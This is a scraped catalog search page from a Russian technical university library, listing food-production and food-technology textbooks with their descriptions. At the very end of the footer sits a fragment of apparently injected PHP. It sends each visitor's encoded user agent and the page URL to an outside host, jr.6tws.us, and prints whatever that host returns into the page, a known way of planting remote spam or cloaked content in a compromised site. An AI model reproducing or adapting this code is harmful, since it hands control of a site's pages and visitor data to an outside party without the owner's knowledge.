Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

45 пользователей


Зарегистрированных: 1 

Ененко Александр Викторович


 
      Наши партнеры
Студенческий информационный портал компании
(("UDC=664$"))И("Вид/Тип документа=EXT")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 7
1. 
Пасько, Ольга Владимировна. Проектирование предприятий общественного питания. Доготовочные цеха и торговые помещения: учебное пособие для прикладного бакалавриата [Электронный ресурс] / О. В. Пасько, О. В. Артюхова, 2018. - 1 r=on-line
Держатели документа (Информация об экземплярах) 

Учебное пособие включает основные положения и методики проектирования доготовочных специализированных цехов, а также вспомогательной и торговой группы помещений предприятий индустрии питания. Представлены варианты планировочных решений цехов с расстановкой технологического оборудования.

Полный текст
2. 
Кошевой, Евгений Пантелеевич. Технологическое оборудование пищевых производств. Расчетный практикум: учебное пособие для вузов [Электронный ресурс] / Е. П. Кошевой, 2018. - 1 r=on-line
Держатели документа (Информация об экземплярах) 

Настоящее учебное пособие включает общие зависимости для расчета, примеры и задачи по видам технологического оборудования, объединенные по функциональному назначению. В книге рассмотрены расчеты производительности, расчеты тепловых затрат и расчеты требуемой мощности привода. Книга дополнена приложениями, которые помогут студентам освоить материалы учебного пособия.

Полный текст
3. 
Крахмальное дело [Текст]. № 27 : Чертежи крахмальных заводов : статистика и литература крахмального производства, 1879. - 30 с. с.
Держатели документа (Информация об экземплярах) 
Полный текст
4. 
Сборник Николаевской инженерной академии и училища [Текст]. Т. 8 : Основы хлебопечения и устройство хлебопекарных печей / М. Н. Зиборов, 1907. - 65 с.
Держатели документа (Информация об экземплярах) 
Полный текст
5. 
Штейнгольц, Борис Исакович. Технологическое оборудование пищевых производств [Текст] / Новосибирский государственный технический университет, 2005. - 21 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
Полный текст
6. 
Керженцев, Владимир Александрович. Проектирование оборудования пищевых производств [Текст]. Ч. 1 / Новосибирский государственный технический университет, Механико-технологический факультет, 2011. - 59, [3] с.
Держатели документа (Информация об экземплярах) 
Полный текст
7. 
Артюхова, Светлана Ивановна. Основы пищевой биотехнологии и нанотехнологии [Текст] : учеб. пособие / С. И. Артюхова, Ю. А. Гаврилова, 2010. - 310 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены основы пищевой биотехнологии и нанотехнологии.

Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2873 - 22.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.93 с.12 запросов, 0.46c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;